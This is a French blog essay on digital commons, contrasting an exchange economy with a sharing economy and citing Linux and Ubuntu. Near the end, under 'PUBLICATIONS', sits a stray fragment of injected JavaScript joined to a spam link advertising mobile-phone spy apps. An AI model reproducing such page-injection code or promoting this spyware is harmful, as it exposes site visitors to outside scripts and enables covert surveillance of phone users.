Biens communs numériques

Alors que la notion d’échange est fondée sur la rareté, celle de partage est fondée sur l’abondance. À l’heure du numérique, partager une oeuvre n’implique pratiquement aucun coût supplémentaire (au delà du coût marginal qui est pratiquement nul), facilitant ainsi le développement d’une économie fondée sur le partage.

Une économie fondée sur l’échange consiste à échanger des biens ou des services en échange d’autres biens ou de services qui ont une valeur équivalente sur le marché.

Dès lors qu’il devient impossible pour un seul individu de satisfaire tous ces besoins,  un système d’échange se développe afin que certains individus se spécialisent dans la production d’une certaine catégorie de biens ou de services, qu’ils échangeront ensuite pour se procurer d’autres biens ou services produits par des tiers.

Dans un système économique basé sur l’échange, la production des individus n’est donc pas immédiatement orientée vers la satisfaction des besoins, mais plutôt vers la satisfaction de la demande du marché. La plupart des biens et des services sont produits dans une optique commerciale, dans le but de maximiser les profits et d’accumuler du capital – qui sera successivement utilisé pour répondre effectivement aux besoins individuels. L’objectif principal est celui de maximiser l’utilité individuelle des acteurs prenant part à la transaction (et non pas l’intérêt général).

Dans le cas d’une économie fondée sur le partage, il ne s’agit plus d’échanger des biens les uns avec les autres, mais – au contraire – de les partager  c’est-à-dire de les mettre à disposition du public sans aucune attente en retour. Ces biens deviennent des “biens communs” qui peuvent être exploités par tous (dans la mesure où ils ne violent pas les conditions de réutilisation). L’économie du partage fonctionne généralement dans une situation d’abondance, où il est possible de partager un bien sans en priver soi-même (ou les autres).

Ces biens ne sont généralement pas produits dans le but de les échanger dans le marché, mais afin de satisfaire des besoins individuels ou communautaires. Une fois ces besoins satisfaits, ils ont terminé leurs fonctions. Ces produits peuvent ainsi être soit échangés sur le marché – soit partagés, afin de favoriser leur diffusion (pour des fins de notorieté) ou pour encourager le partage et la collaboration (pour des fins de réciprocité). Il est caractéristique que le logiciel LINUX (premier concurrent mondial du Système d’exploitation propriétaire Windows de Microsoft) ait été perfectionné en Afrique du Sud sous le nom d’UBUNTU qui signifie en bantou “l’humanité et le partage”.

PUBLICATIONS:

document.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.

Comments are closed.

© 2015 Sofarider Inc. All rights reserved. WordPress theme by Dameer DJ.